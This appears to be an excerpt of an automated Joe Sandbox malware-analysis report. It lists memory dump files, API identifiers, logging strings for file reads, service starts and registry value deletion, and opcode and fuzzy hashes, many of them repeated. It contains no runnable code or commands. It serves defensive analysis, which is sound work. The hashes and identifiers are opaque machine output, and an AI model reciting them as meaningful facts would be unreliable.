                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: d010a90561573719fc9f399b6f534464e5a497c6d7c0cb02a75a670e949dce2c
                                                      • Instruction ID: 521929faa17a5b5059da9ff2eee7dcdb827749491eb5bd5a7bfbbef145ba3abc
                                                      • Opcode Fuzzy Hash: d010a90561573719fc9f399b6f534464e5a497c6d7c0cb02a75a670e949dce2c
                                                      • Instruction Fuzzy Hash: 8EF05E2BF0B60B41F9579E04B56A7B911412F86F75E0A4931EE5C0B7C3EE3EA8829204
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: c691da6f1b1194fdf2f0cfeebaca440441ea7bc60bc50dcfac5fac074da65bcc
                                                      • Instruction ID: 0a55cafa0148c5280e46e6d16e886a669c07be01ce493cfec983ca9989764d1e
                                                      • Opcode Fuzzy Hash: c691da6f1b1194fdf2f0cfeebaca440441ea7bc60bc50dcfac5fac074da65bcc
                                                      • Instruction Fuzzy Hash: E8F0542BF0B60B41F9575E0475767B911412F86F75E0A4931DE5C0B7C3EE3E69829204
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: c691da6f1b1194fdf2f0cfeebaca440441ea7bc60bc50dcfac5fac074da65bcc
                                                      • Instruction ID: 0a55cafa0148c5280e46e6d16e886a669c07be01ce493cfec983ca9989764d1e
                                                      • Opcode Fuzzy Hash: c691da6f1b1194fdf2f0cfeebaca440441ea7bc60bc50dcfac5fac074da65bcc
                                                      • Instruction Fuzzy Hash: E8F0542BF0B60B41F9575E0475767B911412F86F75E0A4931DE5C0B7C3EE3E69829204
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: fclose
                                                      • String ID: [E] (%s) -> Failed(path=%s,err=%08x)$fs_file_read
                                                      • API String ID: 3125558077-1073242539
                                                      • Opcode ID: c691da6f1b1194fdf2f0cfeebaca440441ea7bc60bc50dcfac5fac074da65bcc
                                                      • Instruction ID: 0a55cafa0148c5280e46e6d16e886a669c07be01ce493cfec983ca9989764d1e
                                                      • Opcode Fuzzy Hash: c691da6f1b1194fdf2f0cfeebaca440441ea7bc60bc50dcfac5fac074da65bcc
                                                      • Instruction Fuzzy Hash: E8F0542BF0B60B41F9575E0475767B911412F86F75E0A4931DE5C0B7C3EE3E69829204
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID: [E] (%s) -> Service start failed(lpServiceName=%s,err=%08x)$scm_start
                                                      • API String ID: 1725840886-2678404757
                                                      • Opcode ID: f2649a03ea3f254dd46eb44c8de08af177a9093a2dd4d362b51a28281288e1b6
                                                      • Instruction ID: 00203a8b51b6e3e1f7b29a310766c49d36883c086dcba2496d3178575bd22050
                                                      • Opcode Fuzzy Hash: f2649a03ea3f254dd46eb44c8de08af177a9093a2dd4d362b51a28281288e1b6
                                                      • Instruction Fuzzy Hash: F5F0622AF0E51F42EA275F10A97877812505F03FA4F050534CE4E177D3AD1EA9418388
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: CloseHandleService
                                                      • String ID: [E] (%s) -> Service start failed(lpServiceName=%s,err=%08x)$scm_start
                                                      • API String ID: 1725840886-2678404757
                                                      • Opcode ID: ec4a6679ca904e2c1d0a30445f8a4b53f34b5ef772b44e5321c9d714ca2afa08
                                                      • Instruction ID: 17a8b8727d2055b265c1b25e263c13dcd9675e3ceafa74d75f2e069256cdb8f5
                                                      • Opcode Fuzzy Hash: ec4a6679ca904e2c1d0a30445f8a4b53f34b5ef772b44e5321c9d714ca2afa08
                                                      • Instruction Fuzzy Hash: 6DF0622AF0E51B42EA275F10A97877812505F03FA4F050535CE4E177D39D1EA9418389
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [I] (%s) -> Done(root=0x%p,key=%s,param=%s)$registry_del_value
                                                      • API String ID: 1001908780-1337547089
                                                      • Opcode ID: bc2321b1d27681ef0364b07b9caca71acd9c5b260bdf5c410d6b27a1f371dacf
                                                      • Instruction ID: ae8ff9bef59bb0d5dba2762e7ed042920e10908f2ff857bf54235a7bf781174e
                                                      • Opcode Fuzzy Hash: bc2321b1d27681ef0364b07b9caca71acd9c5b260bdf5c410d6b27a1f371dacf
                                                      • Instruction Fuzzy Hash: 69E09269B0E60E81ED135F40F8646796214FB52FC4F440035EB0E427929E2CE6899208
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877114651.00007FFDA55A1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDA55A0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877096559.00007FFDA55A0000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877174958.00007FFDA55B6000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877196258.00007FFDA55C0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877217791.00007FFDA55C3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877235112.00007FFDA55C4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda55a0000_main.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: 52071573abfc37b688244c61e326d04804cb9da7333af29a775557c74bcfae91
                                                      • Instruction ID: eb7c0b3040e1bb08fa11f64b2cdfa0e10bcf2362a47a6763c7b3dbdde3221ed5
                                                      • Opcode Fuzzy Hash: 52071573abfc37b688244c61e326d04804cb9da7333af29a775557c74bcfae91
                                                      • Instruction Fuzzy Hash: F2012C69B1B60A91FE524F14E43837522E0AF8AF91F490834CA0D033E2EF3DA5448618